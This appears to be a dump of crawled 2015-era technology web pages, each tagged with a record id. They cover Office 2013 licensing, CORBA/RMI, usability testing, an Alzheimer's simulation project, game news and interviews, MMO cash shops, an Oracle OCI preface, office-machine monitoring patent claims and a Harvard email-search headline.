Not only does that mean you will be unable to uninstall the software on your computer and reinstall on a new computer, it also means if you computer crashes and is unrecoverable you'll be buying a new license for Windows 2013.
This move is a change from past licensing agreements with older versions of Office, and many believe that this move is a way for Microsoft to push consumers to its subscription Office plans.
"That's a substantial shift in Microsoft licensing," said Daryl Ullman, co-founder and managing director of the Emerset Consulting Group, which specializes in helping companies negotiate software licensing deals. "Let's be frank. This is not in the consumer's best interest. They're paying more than before, because they're not getting the same benefits as before."
Prior to Office 2013, Microsoft's end-user license agreement for retail copies of Office allowed the owner to reassign the license to a different device any number of times as long as that reassignment didn't happen more than once every 90 days. The Office 2013 EULA changes past verbiage stating, "Our software license is permanently assigned to the licensed computer."
When Computer World asked Microsoft if customers can move Word and its license to replacement PC if the original PC was lost, stolen, or destroyed Microsoft only replied "no comment."
Source: Computer World Comments Threshold -1
RE: Great
CaedenV
OneNote is perhaps the best single piece of software that MS has ever come out with... but in true MS form they have no idea how to market it. It is an organizational tool that allows you to take snippits of video, web pages, office documents of all kinds, text, and hand written notes and put them in a sort of digital notebook. At home I use it to help with project planning for home upgrades (solar panels, PEX water piping, etc.), while at work I use it the way I use to use Access to track my interactions with business partners. It is like having all of the useful stuff of access in a more visually appealing package, but without learning how to program macros (granted, Access is WAY more powerful, but it is overkill for what I do)Also, if you have win8 OneNote Metro is free anyways, so it is just one less reason to get office anyways (granted the free version is not quite as useful as the desktop version, but still quite handy). Parent
Office 365 Launches Today for $100/Year | 计算机 |
2015-48/3681/en_head.json.gz/1265 | CORBA , RMI and now JSHOOTER !
Thread: CORBA , RMI and now JSHOOTER !
mcgrow
distributed Applications
CORBA products provide a framework for the development and execution of distributed applications. But why would one want to develop a distributed application in the first place? As you will see later, distribution introduces a whole new set of difficult issues. However, sometimes there is no choice; some applications by their very nature are distributed across multiple computers because of one or more of the following reasons:
� The data used by the application are distributed
� The computation is distributed
� The users of the application are distributed
Data are Distributed
Some applications must execute on multiple computers because the data that the application must access exist on multiple computers for administrative and ownership reasons. The owner may permit the data to be accessed remotely but not stored locally. Or perhaps the data cannot be co-located and must exist on multiple heterogeneous systems for historical reasons.
Computation is Distributed
Some applications execute on multiple computers in order to take advantage of multiple processors computing in parallel to solve some problem. Other applications may execute on multiple computers in order to take advantage of some unique feature of a particular system. Distributed applications can take advantage of the scalability and heterogeneity of the distributed system.
Users are Distributed
Some applications execute on multiple computers because users of the application communicate and interact with each other via the application. Each user executes a piece of the distributed application on his or her computer, and shared objects, typically execute on one or more servers. A typical architecture for this kind of application is illustrated below.
Prior to designing a distributed application, it is essential to understand some of the fundamental realities of the distributed system on which it will execute.
The Java Remote Method Invocation Application Programming Interface (API), or Java RMI, is a Java application programming interface that performs the object-oriented equivalent of remote procedure calls (RPC).
1. The original implementation depends on Java Virtual Machine (JVM) class representation mechanisms and it thus only supports making calls from one JVM to another. The protocol underlying this Java-only implementation is known as Java Remote Method Protocol (JRMP).
2. In order to support code running in a non-JVM context, a CORBA version was later developed.
Usage of the term RMI may denote solely the programming interface or may signify both the API and JRMP, whereas the term RMI-IIOP (read: RMI over IIOP) denotes the RMI interface delegating most of the functionality to the supporting CORBA implementation.
The programmers of the original RMI API generalized the code somewhat to support different implementations, such as a HTTP transport. Additionally, the ability to pass arguments "by value" was added to CORBA in order to support the RMI interface. Still, the RMI-IIOP and JRMP implementations do not have fully identical interfaces.
AND NOW JSHOOTER
JShooter (Reflect in Network Framework)
What is JShooter?
JShooter is a framework for distributing application programs on the network. Certainly, you have used RMI, Corba and JMS. Each of aforementioned technologies has its own special problems and at the same time enjoys extraordinary advantages. However, you must be careful about the expenses caused by these technologies. In most cases RMI, Corba and JMS increase the productions' costs unbelievably. However in other cases they confuse programmers. Years ago, Reflect Oriented Programming was the focus of attention within professional programmers, then Aspect Oriented Programming came into the programming world but instead of reducing the programmer's task, it causes the professional programmers and even the amateur ones to be confused in many cases. One of the most important capabilities of JShooter is that it makes the "Reflect Oriented Programming" easier to use.
For more information about JSHOOTER goto
Browse Shine-Enterprise-Java-Pattern Files on SourceForge.net
download it's doc and shine enterprise library
RMIJava Messenger Program?Difference between RIM( Remote Methode Invocation) and WEB severPrinceDoes RMI require separate threadsRMI problemhelp for Object Oriented Programming RMIRMI connection issuermi problemsRMI
a new pattern with a new architecture
| Deciding Interceptor Ordering?
corba, j2ee, java, rmi | 计算机 |
2015-48/3681/en_head.json.gz/1718 | The ultimate guide to testing your website
By Cennydd Bowles,
Internet How to conduct 'guerilla testing' to perfect usability
Page 1 Page 1 Page 2 Page 3 Page 4 Page 5 After so many shoddy sites, pop-up windows and forced registrations, the truth is that if people don't find your website easy to use, they won't come back. Worse, they'll tell their friends just how clueless you are. The answer is, of course, to design everything around the needs of your users. We've known this for years, but there's still resistance to even the most basic usability testing.
See today's best Cyber Monday deals for computingExcuses, excuses "The site makes sense to me," designers will say. "I don't need to test it with other people." Ah, but you're very different to your users, which means it's dangerous to assume they'll use a website in the same way as you – particularly if you've just spent months building it and learning all its quirks. Article continues below
Another excuse people use for not testing is: "We can just use focus groups/market research." But we're talking about two very different things here. Market research is really about "How can I attract customers?". It focuses on people's reactions to a particular marketing or brand approach. Usability testing asks: "How can I make it easy for customers once they're here?" This touches upon people's emotional responses, but it's more about seeing whether people can use something than whether they like it. "But surely, usability is just common sense," you might go on to argue. This attitude is understandable to an extent – well-designed systems often do look very simple and it's tempting to conclude that making things easy is, well, easy. Unfortunately, the hard part is everything leading up to the simple solution. Try just one usability test and you'll be amazed at how a site that seemed sensible to you can cause problems for others. One final line of argument we often encounter against testing is: "It's just too expensive!" Thankfully, nowadays, this is only the case for large, formal usability testing. Sometimes multiple rounds of testing and teams of experts are entirely appropriate, but more and more people are turning to 'guerrilla' usability testing for a quick, cheap insight into how to make their websites better. Here's how to do it. Planning your tests First you need to consider at what stage of development you want your site tested. Running a usability test on an existing site can give you an excellent overview of how well it works and how it can be improved. This is what's known as a summative test. However, usability testing is for life, not just for Christmas, so it's often worth testing sites as you're making them, too – studies show it's 100 times cheaper to fix problems during design than after launch. This is called formative testing because it helps you refine your ideas as you go. It's an increasingly common approach and fits in particularly well with the Agile philosophy. If you're testing an unfinished site you need to choose what bits to test – usually stuff you've just developed, or perhaps a prototype. Lo-fi paper prototypes are great ways to test early drafts of your site. Either take wireframes, if you have any, or sketch and cut out the relevant sections. You can then rearrange them on a large A3 sheet and ask your participant to interact with it as if it were a real site: using a finger to represent clicks, speaking keyboard input out loud and so on. Although this approach requires a certain suspension of disbelief, participants are usually happy to adapt to this unusual form of test. Paper prototypes are best suited to sites early in development. As you get closer to a solution, you'll want to test either what you've already coded or more substantial prototypes. For higher-fidelity prototypes, you can use specialist prototyping software such as Axure and iRise, or get stuck in with HTML. 1
Next Page Related news
10 things you need to know to build a small business website
Beeb's tech woes continue as iPlayer and BBC website suffer weekend outages
Time for a change: Beeb to remove 'inaccurate' clock from homepage
Allocation for last batch of IPv4 addresses begins | 计算机 |
2015-48/3681/en_head.json.gz/2108 | HomeAbout OSCOur MissionAt A GlanceGovernanceCareersLeadershipPartnersVisit the Ohio Supercomputer CenterSupercomputingGetting StartedHPC EnvironmentsChangelogAvailable SoftwarePortalsTutorials & TrainingSupport ServicesFAQCiting OSCSearch DocumentationCyberinfrastructureAnalytics ResearchNetworking ResearchNetworking SupportOARnetResearchBioinformaticsVirtual Environments & SimulationComputational Science Engineering ApplicationsSystems ResearchGet an AccountRenew your projectResearch ReportsSupercomputing PortalsEducationSummer Educational ProgramsYoung Women's Summer InstituteSummer InstituteSponsor Summer ProgramsRalph Regula School of Computational ScienceIndustryAweSimStarter Packages for IndustryFull Service OfferingsOur ClientsNewsUpcoming EventsMedia InquiriesMedia KitPress ReleasesBrandingBlogUpcoming EventsMedia InquiriesMedia KitPress ReleasesBrandingContact UsSupercomputing SupportGeneral InquiriesMedia InquiriesStaff Directory You are hereHome Researcher simulates Alzheimer's 'protein misfolding' errors Computational project to yield better understanding of devastating disorderComputational project to yield better understanding of devastating disorder
Jie Zheng, Ph.D.
Using computer simulations, Dr. Zheng is predicting and validating several molecular models of A oligomers to bettter understand how they are formed and accumulate in Alzheimer’s diseases.
Columbus, Ohio (April 21, 2010) – A University of Akron researcher is creating sophisticated computer simulations at the Ohio Supercomputer Center to help understand how “misfolded” proteins in the brain contribute to degenerative disorders, such as Alzheimer’s disease.
Alzheimer’s disease is the most common human neurodegenerative disorder, affecting as many as 5.1 million people in America alone, according to the National Institutes of Health (NIH). Alzheimer’s most often appears after age 60 and leads to progressive and irreversible memory loss, disability and, eventually, death. Disorders like Alzheimer’s occur through a complex series of events that take place in the brain over a long period of time, probably beginning a decade or two before the most significant symptoms arise.
In the nucleus of nearly every human cell, long strands of DNA are packed tightly together to form chromosomes, which contain all the instructions a cell needs to function. To deliver these instructions to various other cellular structures, the chromosomes dispatch very small protein fibers – called oligomers – that fold into three-dimensional shapes. Misfolded proteins – called amyloid fibrils – cannot function properly and tend to accumulate into tangles and clumps of waxy plaque, robbing brain cells of their ability to operate and communicate with each other, according to NIH.
The strength of this research project lies in the integration of different experimental techniques with a computational approach to effectively illustrate various aspects of amyloid formation and its damaging effects, according to Jie Zheng, Ph.D., an assistant professor of chemical and biomolecular engineering at the University of Akron.
“The exact mechanism of amyloid formation and the origin of its toxicity are not fully understood, primarily due to a lack of sufficient atomic-level structural information from traditional experimental approaches, such as X-ray diffraction, cryoelectron microscopy and solid-state NMR data,” Zheng explained. “Molecular simulations, in contrast, allow one to study the three-dimensional structure and its kinetic pathway of amyloid oligomers at full atomic resolution.”
Zheng’s research group is developing a multiscale modeling and simulation platform that integrates structural prediction, computational biology and bioinformatics to establish a direct correlation between the formation of oligomers and their biological activity in cell membranes. This research is important for understanding the build-up of protein plaque, how it contributes to the breakdown of cells and how the process might be prevented.
“This project has broad impacts on the prevention of diseased-related protein misfolding and aggregation, said Zheng. “The ultimate goal of this project is to rationally design a series of effective ligands/inhibitors to prevent amyloid formation.”
Zheng’s anti-amyloid project is leveraging the computational muscle of the IBM Cluster 1350 system at the Ohio Supercomputer Center. The center’s flagship supercomputer system, named the Glenn Cluster, features 9,500 cores, 24 terabytes of memory and a peak computational capability of 75 teraflops – about 75 trillion calculations per second.
Zheng’s computational approach uses replica-exchange molecular dynamics simulations, a computationally intensive process for analyzing protein folding. The REMD method performs a large number of concurrent simulations of amyloid formation while introducing different variables, such as temperature, that can influence the outcome of the process.
“It’s great to hear that OSC resources are being utilized to investigate the cause of such devastating human diseases, especially one that robs us of the very essence of our humanity, our memories,” said Don Stredney, director of the Center’s Interface Lab and research scientist for Biomedical Applications. “We are pleased that OSC can accelerate the iterations required for such complex conformational studies, leading to new insights into the mechanisms of memory loss.”
Zheng’s amyloid protein research project recently won a five-year, $400,000 award through the Faculty Early Career Development program of the National Science Foundation (NSF). One of the NSF’s most prestigious recognitions, the CAREER Award is bestowed “in support of junior faculty who exemplify the role of teacher-scholars through outstanding research, excellent education and the integration of education and research within the context of the mission of their organizations.”
Zheng joined the department of Chemical and Biomolecular Engineering at the University of Akron in 2007 as an assistant professor, after working as a scientist at the National Cancer Institute since 2005. He received his doctorate in chemical engineering from the University of Washington in 2005.
The Ohio Supercomputer Center is a catalytic partner of Ohio universities and industries that provides a reliable high performance computing infrastructure for a diverse statewide/regional community. Funded by the Ohio Board of Regents, OSC promotes and stimulates computational research and education in order to act as a key enabler for the state's aspirations in advanced technology, information systems, and advanced industries. For additional information, visit http://www.osc.edu
Subjects: Research OSC Media Contacts | 计算机 |
2015-48/3681/en_head.json.gz/2152 | What Akers Media Group does...
PublishingThe magazines of Akers Publishing — Lake & Sumter Style, Healthy Living, and The Villages Style — set the Akers Media standard by focusing on the communities in which they serve. Each magazine provides up-to-date, entertaining, and thought-provoking content that thoroughly represents the people and places that make these communities special
CreativeWhen you choose Akers Creative, you gain a team of dedicated Akers Media professionals. We dissect your business and all its various components, getting down to the core of what makes you tick. By looking at every angle, we can help you develop a plan that will ensure success.
StudioThe old adage holds that a picture is worth a thousand words. Akers Media's philosophy is a thousand words is merely a good starting point. At Akers Studio, we produce priceless images that inspire words like “magnificent,” “breathtaking,” “stunning” or “perfect.” And we do so for every client, whether they need a quick passport photo or a 60-minute documentary. Akers Media's Work
Here are just a few of our faves.
Yeah, they've called our name a time or two.
Akers Media Group has been recognized with over 75 awards for excellence in publishing and creative.
Akers is Amazing!
Akers Media is one of central Florida’s most award winning companies and is ranked #23 in Inc. Magazine’s fastest growing media companies nation wide.
It's True.
Akers Media has been recognized with over 75 awards for design, writing, advertising and publishing excellence. Additionally, Akers Media has been recognized locally as “Business of the Year” by the Leesburg Partnership; “Partner of the Year” by Lifestream Behavioral Center, The Lake County Education Foundation, and Florida Hospital Waterman Foundation; and “The Health Hero” by the Lake County Health Department.
Akers Media is a well-known, well-respected company due to its overwhelming popular publications, as well as its design and photography services. Akers Media websites have also gained a tremendous following since its launch of StyleTV and its online blog. These websites are now experiencing an average of over 300,000 hits each month. We believe that our popularity stems from our ability to engage readers and connect with the community. We are able to do this so effectively because we have a experienced and talented in-house team of designers, photographers, video producers, writers, editors, web developers and administrators.
Stop by and visit Akers Media.
We'll start you on a path to a new creative solution.
Akers Media, 108 5th Street, Leesburg FL 34748
Contact Akers Media!
Name* Email * Telephone * Subject * Message * Enter a number between 5 and 9 * :
E-mail must be valid and message must be longer than 100 characters. | 计算机 |
2015-48/3681/en_head.json.gz/2467 | The Fedora Project is an openly-developed project designed by Red Hat, open for general participation, led by a meritocracy, following a set of project objectives. The goal of The Fedora Project is to work with the Linux community to build a complete, general purpose operating system exclusively from open source software. Development will be done in a public forum. The project will produce time-based releases of Fedora about 2-3 times a year, with a public release schedule. The Red Hat engineering team will continue to participate in building Fedora and will invite and encourage more outside participation than in past releases. Fedora 15, a new version of one of the leading and most widely used Linux distributions on the market, has been released. Some of the many new features include support for Btrfs file system, Indic typing booster, redesigned SELinux troubleshooter, better power management, LibreOffice productivity suite, and, of course, the brand-new GNOME 3 desktop: "GNOME 3 is the next generation of GNOME with a brand new user interface. It provides a completely new and modern desktop that has been designed for today's users and technologies. Fedora 15 is the first major distribution to include GNOME 3 by default. GNOME 3 is being developed with extensive upstream participation from Red Hat developers and Fedora volunteers, and GNOME 3 is tightly integrated in Fedora 15." manufacturer website
1 dvd for installation on an 86_64 platform back to top | 计算机 |
2015-48/3681/en_head.json.gz/5033 | phpJabberd
Acronis True Image 2010 – Review (1) Videocalls on iphone – Fring is updated!
PSP emulator for PS3 – Play PSP games on your PS3
Written by Francis on Consoles, PS3, PSP Add comments
According to French site PS3Gen.fr, Sony is working on an emulator that will allow PSP games to be played on the PS3 system.
This is just a rumor for the time being, however, according to their source retail PlayStation Portable UMD titles, those available on the PlayStation Store and even new PSP Minis may see the light of day on the PlayStation 3 in the future.
To quote, roughly translated: “Playing with PSP games on the PS3 seems a project that Sony is preparing in secret. Here’s the surprising news that we have gleaned and could make love dematerialization games.
The “ONLY COMPATIBLE with the PSP”… may disappear.
This should be made possible through an emulator in the PSP and PS3 through the dematerialization of games that are now sold on the PlayStation Store and is a UMD in stores. This would also be interesting for all games in the category Minis.
The minis soon on PS3 without additional programming from the devs. This information has been provided by a knowledgeable person and we will pass calmly as we have seen evidence that convinced us.
Unfortunately we are unable to upload the “evidence” but the future will show whether we were right. | 计算机 |
2015-48/3681/en_head.json.gz/5210 | Posted Ouya: ‘Over a thousand’ developers want to make Ouya games By
Check out our review of the Ouya Android-based gaming console.
Even after the relatively cheap, Android-based Ouya console proved a massive success on Kickstarter (the console was able to pull in nearly $8.6 million from investors despite having an initial goal of only $960,000), pundits and prospective owners of the new gaming machine loudly wondered how well it would be able to attract developers who would otherwise be making games for the Xbox 360, iPhone or PC. Assuming you believe official statements made by the people behind the Ouya console, there is nothing to worry about on that front.
“Over a thousand” developers have contacted the Ouya creators since the end of their Kickstarter campaign, according to a statement published as part of a recent announcement on who will be filling out the company’s leadership roles now that it is properly established. Likewise, the statement claims that “more than 50” companies “from all around the world” have approached the people behind Ouya to distribute the console once it is ready for its consumer debut at some as-yet-undetermined point in 2013.
While this is undoubtedly good news for anyone who’s been crossing their fingers, hoping that the Ouya can make inroads into the normally insular world of console gaming, it should be noted that while these thousand-plus developers may have attempted to reach the Ouya’s creators, the company offers no solid figures on how many of them are officially committed to bringing games to the platform. That “over a thousand” figure means little if every last developer examined the terms of developing for the Ouya and quickly declined the opportunity in favor of more lucrative options. We have no official information on how these developer conversations actually went, so until we hear a more official assessment of how many gaming firms are solidly pledging support to the Ouya platform, we’ll continue to harbor a bit of cynicism over how successful this machine might possibly be.
As for the aforementioned personnel acquisitions, though they’re less impressive than the possibility that thousands of firms are already tentatively working on games for the Ouya, they should offer a bit more hope that the company making the console will remain stable, guided by people intimately familiar with the gaming biz. According to the announcement, Ouya has attracted former IGN president (and the first investor in the Ouya project) Roy Bahat to serve as chairman of the Ouya board. Additionally, the company has enlisted former EA development director and senior development director for Trion Worlds’ MMO Rift, Steve Chamberlin, to serve as the company’s head of engineering. Finally, Raffi Bagdasarian, former vice president of product development and operations at Sony Pictures Television has been tapped to lead Ouya’s platform service and software product development division. Though you may be unfamiliar with these three men, trust that they’ve all proven their chops as leaders in their respective gaming-centric fields.
Expect to hear more solid information on the Ouya and its games line up as we inch closer to its nebulous 2013 release. Hopefully for the system’s numerous potential buyers, that quip about the massive developer interest the console has attracted proves more tangible than not. | 计算机 |
2015-48/3681/en_head.json.gz/5318 | Singularity Interview
Written by Charles Husemann on 6/10/2010 for
Singularity was introduced at E3 last year and wowed quite a few people with it's time bending plot and top notch visuals. With the game scheduled to hit stores in a few weeks we were able to land an exclusive interview with Raven software to dive a bit deeper into the game. Here it is.
Can you introduce yourself, talk about your role on the project and how you got into the games industry? What kind of things do you do daily on the game?
I’m Brian Raffel, Co-founder and Studio Head of Raven Software. Singularity is a very important game for us, so I played many different roles from level design to artwork to story. I wanted to make sure it was the best it could possibly be. What's the backstory for Singularity and could you introduce us to the character we'll be playing? Is he based on any real life person or group of people? How does he differ from the standard FPS hero?
In Singularity, you take on the role of Nathaniel Renko, a U.S. Recon Marine. Because we want to immerse the player in our world, you rarely see Renko in the game and he doesn’t speak at all - this helps the player feel more like they are the main character. How did you come up with the concept of the game? Did you start with the time manipulation elements and work a story around it or the other way around?
The game started around the core concept of using time to change the state of objects/creatures/people on an individual basis. We knew that would open the player up to seeing the world in a whole new light and give them abilities they’ve never had before. The story and the time manipulation elements were developed at the same time – it was the best way to make them feel like a natural fit with each other. Was it hard to get the greenlight on a new IP with Activision? Is Singularity going to be a stand-alone game or are you looking at it as a beachhead for a new franchise?
New IP’s are very costly and always a bit of a gamble so yes, it wasn’t easy to get it to the light of day. But Activision is always willing to try new a IP if it offers something new and exciting. We did develop a secret demo off the radar because we knew the core concept was something they had to see in action - a bulleted paragraph just wouldn’t do it justice. It was very cool for me to show it to Activision and have them so impressed that they were ready to move on it right away.
Russians seem to have become a popular bad guy in games lately (Modern Warfare 2, Bad Company 2) and now in Singularity. Why do you think we're back to fighting Russians in games again?
We chose Russia for several reasons, the number one being my brother, Steve, and I grew up during the Cold War and we wanted to use that to drive the story. Secondly, the Russians have always impressed us with their ability to think on a massive scale; it would be believable for them to pull off this type of scientific accomplishment.
Raven has a long, solid background in developing FPS games, what are the key elements in a modern FPS game? What has been the most important change in the genre over the last ten years or so? Are we at a point where game developers are just refining the genre or do you think there's still a big leap in the genre coming up?
Visual fidelity continues to improve but most companies are now on a level playing field in regards to that because everyone has the same console to work with and many developers use the Unreal engine. 10 years ago you could stand out simply by having the latest visual bells and whistles.
The biggest changes are that gameplay hooks and story have become incredibly important. What can your game do that no other game can? Do you have a compelling story that engages the player? Are the characters believable? Are they well acted? Right now, the game industry is in a refinement period. As new platforms become available such as Natal or iPad, we’ll discover things about interaction that will provide the next big leap. Some of those lessons will be carried back to a “standard FPS”. Look at the first round of iPad games; FPS games don’t translate well because there's a big tablet to hold and the controls didn’t make the leap from iPhone up. Eventually that will be solved and it will become the standard. To sum up, I think there are still big leaps on the horizon, probably in the interaction side of things.
Gamers and press seem a bit pre-occupied with how long the single player portion of games are. Do you start with a target of how long you want the game to be or do you just focus on telling a story and then add more if the game is short? Is length a valid criteria or not?
Raven’s number one goal is creating a quality gaming experience that’s exciting from beginning to end. We would rather the player finish wanting more, rather than have them slug through 12 + hours of mediocre content. But we are sensitive to the fact that people feel their being over charged if they aren’t getting 6 to 8 hours out of a game. This figure has changed a lot in the 20 years that we’ve been developing games; there was a time when gamers expected 20+ hours of game play. What kind of time manipulation abilities will you have with the TMD? Were there other abilities you thought off but had to eliminate for technical or time reasons? What kind of design challenges does having the time manipulation features have?
The biggest design challenge was how we would introduce the TMD and it’s abilities to the player. We had a TON of ideas on what to do with the Time Manipulation Device – way more than we could put in. One of the basic abilities I can reveal is being able to shift an object forward or backwards in time, and using its different states to aid in gameplay. For example, you could age a barrel to dust, stand on it, and then age it back to full height and use it as a pedestal to jump up to a new area. This is just a small example of what we’re allowing the player to do with the TMD. Outside of the TMD what kind of weapons will players have at their disposal? Could you discuss the selection criteria for the game's arsenal? There are a variety of weapons for the player to use such as a machine gun, shotgun, and sniper rifle as well as some non-standard ones. We wanted to make sure our non-standard weapons provided a new type of experience or a different way to fight. We didn’t want to duplicate functionality from weapon to weapon and I think we succeeded in that.
Any chance you'll be supporting motion controls via Natal and/or move? What are your thoughts on motion controls for first person shooters? Is there something usefull there or not?
We aren't currently planning to support motion controls for Singularity. Motion controls like the Natal are very intriguing and could open up exciting new avenues in the first person shooter style of game. However, a game should be designed from the outset to take advantage of motion control and not shoe-horned in to be a marketing bullet point on the box. Since these controls debuted well after we were into development on Singularity, we chose not to pursue it.
What's been the biggest change in the game since you started development? Were there things that turned out better than expected?
The biggest changes during the development of Singularity were the way the TMD is used and how the player interacts with the objects/creatures/people the TMD can affect. We'd like to thank Brian for taking the time to answer our questions as well as Wiebke for coordinating the interview and dealing with my constant nagging. About Author
Hi, my name is Charles Husemann and I've been gaming for longer than I care to admit. For me it's always been about competing and a burning off stress. It started off simply enough with Choplifter and Lode Runner on the Apple //e, then it was the curse of Tank and Yars Revenge on the 2600. The addiction subsided somewhat until I went to college where dramatic decreases in my GPA could be traced to the release of X:Com and Doom. I was a Microsoft Xbox MVP from 2009 to 2014 | 计算机 |
2015-48/3681/en_head.json.gz/5536 | Research shows that computers can match humans in art analysis
Jane Tarakhovsky is the daughter of two artists, and it looked like she was leaving the art world behind when she decided to become a computer scientist. But her recent research project at Lawrence Technological University has demonstrated that computers can compete with art historians in critiquing painting styles.
While completing her master’s degree in computer science earlier this year, Tarakhovsky used a computer program developed by Assistant Professor Lior Shamir to demonstrate that a computer can find similarities in the styles of artists just as art critics and historian do.
In the experiment, published in the ACM Journal on Computing and Cultural Heritage and widely reported elsewhere, Tarakhovsky and Shamir used a complex computer algorithm to analyze approximately1,000 paintings of 34 well-known artists, and found similarities between them based solely on the visual content of the paintings. Surprisingly, the computer provided a network of similarities between painters that is largely in agreement with the perception of art historians.
For instance, the computer placed the High Renaissance artists Raphael, Da Vinci, and Michelangelo very close to each other. The Baroque painters Vermeer, Rubens and Rembrandt were placed in another cluster.
The experiment was performed by extracting 4,027 numerical image context descriptors – numbers that reflect the content of the image such as texture, color, and shapes in a quantitative fashion. The analysis reflected many aspects of the visual content and used pattern recognition and statistical methods to detect complex patterns of similarities and dissimilarities between the artistic styles. The computer then quantified these similarities.
According to Shamir, non-experts can normally make the broad differentiation between modern art and classical realism, but they have difficulty telling the difference between closely related schools of art such as Early and High Renaissance or Mannerism and Romanticism.
“This experiment showed that machines can outperform untrained humans in the analysis of fine art,” Shamir said.
Tarakhovsky, who lives in Lake Orion, is the daughter of two Russian artists. Her father was a member of the former USSR Artists. She graduated from an art school at 15 years old and earned a bachelor’s degree in history in Russia, but has switched her career path to computer science since emigrating to the United States in 1998.
Tarakhovsky utilized her knowledge of art to demonstrate the versatility of an algorithm that Shamir originally developed for biological image analysis while working on the staff of the National Institutes of Health in 2009. She designed a new system based on the code and then designed the experiment to compare artists.
She also has used the computer program as a consultant to help a client identify bacteria in clinical samples.
“The program has other applications, but you have to know what you are looking for,” she said.
Tarakhovsky believes that there are many other applications for the program in the world of art. Her research project with Shamir covered a relatively small sampling of Western art. “this is just the tip of the iceberg,” she said.
At Lawrence Tech she also worked with Professor CJ Chung on Robofest, an international competition that encourages young students to study science, technology, engineering and mathematics, the so-called STEM subjects.
“My professors at Lawrence Tech have provided me with a broad perspective and have encouraged me to go to new levels,” she said.
She said that her experience demonstrates that women can succeed in scientific fields like computer science and that people in general can make the transition from subjects like art and history to scientific disciplines that are more in demand now that the economy is increasingly driven by technology.
“Everyone has the ability to apply themselves in different areas,” she said. | 计算机 |
2015-48/3681/en_head.json.gz/5580 | The Devil's Advocate: What's for Sale and What's at StakeColumn By Victor Barreiro Jr. on July 04, 2012
In the world of gaming, double-dipping is the practice of generating an additional revenue stream from the same product by selling that product a second time in a new incarnation, such as a special edition. While the nature of what constitutes double-dipping in this day and age has been muddled by the increasing number of ways in which developers attempt to coax money out of our pockets, it can be said that a blatant show of it can sour the perception of the public towards a product (even as those same people consider signing up for that extra doohickey or perk).Trying to talk about such practices in MMORPGs is difficult, however, mostly because there are different payment matrices available in online games. There are also a variety of ways by which developers draw consumer money out from pockets and into development coffers. Most of them involve paying for extra goods or services. advertisement One path taken by a good number of online game developers these days is the cash shop route, and today's Devil's Advocate seeks to discuss whether there are legitimate concerns to be had in certain cash shop practices. We'll look at some practices that have occurred in recent years, and discuss how these practices have shaped the MMORPG landscape and what you can do to alter the landscape yourself.Shopping in Subscription GamesWhile free-to-play titles generally survive on cash shop revenue for development, it's the subscription games that engender a lot of backlash from gamers for selling extras. At its core, MMO double-dipping as a practice is strongly associated with the combination of subscription games and the sale of additional virtual items or services.While the history of this practice hasn't really been documented fully, some people tend to think the Celestial Steed commotion of World of Warcraft started the notion of subscription-based MMOs selling extra services or items, whether it was in-game or out of it. Other titles like RIFT, with its 10-dollar digital upgrades, and The Secret World, with its in-game store, have also taken up the charge, in a manner of speaking.Whatever the catalyst was for the subscription-with-shop model, there was one noticeable change it brought to developers' minds. At last, it now seemed alright to ask consumers of subscription and free-to-play games to pay for services and virtual goods that had legitimate uses or understandable creative or developmental costs, such as server transfers, name and race changes, or fluff items.Fluff and “Low-Impact” ItemsThat said, the sale of fluff and what I term as “low-impact” items are a staple of the cash shop phenomenon. By fluff and “low-impact,” I refer to the sale of items that are either cosmetic in nature, such as pets, clothing, and dyes, or have little impact on game progression or power levels outside of solo play, such as experience or progress bar accelerators in a variety of games.I feel that many people find the peddling of fluff and low-impact items generally innocuous. Historically speaking though, when someone sets a precedent for a given value or idea and it succeeds in assimilating itself as an alright practice, other things follow.From a certain point of view, there is one thing to worry about when it comes to selling fluff or low-impact items, and that's defining the upper limit of what is considered low-impact to begin with. Famously, there's the issue of having travel buffs and mounts for sale, especially if games are designed to start you off without a mount or without the money to purchase a mount at the offset. More notably, Warner Bros. and Turbine came out with starter armor kits on the LOTRO Store as a way for those who want to pay for the convenience of being a little bit more effective at the start of the game. | 计算机 |
2015-48/3681/en_head.json.gz/6557 | Oracle Call Interface Programmer's Guide
The Oracle Call Interface (OCI) is an application programming interface (API) that allows applications written in C or C++ to interact with one or more Oracle database servers. OCI gives your programs the capability to perform the full range of database operations that are possible with an Oracle database server, including SQL statement processing and object manipulation.
The Preface includes the following sections:
The Oracle Call Interface Programmer's Guide is intended for programmers developing new applications or converting existing applications to run in the Oracle environment. This comprehensive treatment of OCI will also be valuable to systems analysts, project managers, and others interested in the development of database applications.
This guide assumes that you have a working knowledge of application programming using C. Readers should also be familiar with the use of Structured Query Language (SQL) to access information in relational database systems. In addition, some sections of this guide also assume a knowledge of the basic concepts of object-oriented programming.
See Also: For information about SQL, refer to the Oracle9i SQL Reference and the Oracle9i Database Administrator's Guide.
For information about basic Oracle concepts, see Oracle9i Database Concepts.
For information about the differences between the Standard Edition and the Enterprise Edition and all the features and options that are available to you, see Oracle9i Database New Features.
The Oracle Call Interface Programmer's Guide contains four parts, split between two volumes. A brief summary of what you will find in each chapter and appendix follows:
PART I: OCI CONCEPTS
Part I (Chapter 1 through Chapter 9) provides conceptual information about how to program with OCI to build scalable application solutions that provide access to relational data in an Oracle database.
Chapter 1, "Introduction and Upgrading"
This chapter introduces you to the Oracle Call Interface and describes special terms and typographical conventions that are used in describing the interface. This chapter also discusses features new to the current release. | 计算机 |
2015-48/3681/en_head.json.gz/7535 | A method and system for monitoring, controlling and diagnosing operation of a machine such as a business office machine including a facsimile machine, a copier, and a printer. When the speed of communication between the remote device and machine is not urgent, a connectionless mode of communication may be used. The form of connectionless communication is an electronic mail message transmitted over the Internet. However, when a condition needs urgent action, a direct connection is used for communication such as communication via a telephone or ISDN line. The information obtained from the machine is stored in one or more data bases within a company and information of the machine is shared between a service department, engineering and design department, manufacturing department, and marketing department. As communication over the Internet via electronic mail is not secure, the connectionless-mode messages transmitted using Internet electronic mail are encrypted.
1. A business office device configured to connect to a monitoring device that monitors the business office device, the business office device comprising:
at least one memory, within the business office device, for storing status information of the business office device; and
a communications interface, within the business office device, for transmitting, using an Internet e-mail protocol at an application layer, an e-mail containing a first portion of the status information to the monitoring device, wherein the business office device is selected from the group consisting of a printer, a copier, a scanner, a metering system and a multi-function copier.
2. The business office device as claimed in claim 1, further comprising a direct connection mode-based interface for transmitting to the monitoring device at least one of a second portion of the status information and the first portion of the status information.
3. The business office device as claimed in claim 2, wherein the at least one memory stores the status information such that both the e-mail interface and the direct connection- | 计算机 |
2015-48/3681/en_head.json.gz/7940 | More secret email searches revealed at Harvard PC Advisor
More secret email searches revealed at Harvard
Dean admits she failed to report additional searches to higher-ups
John P. Mello
|CSO
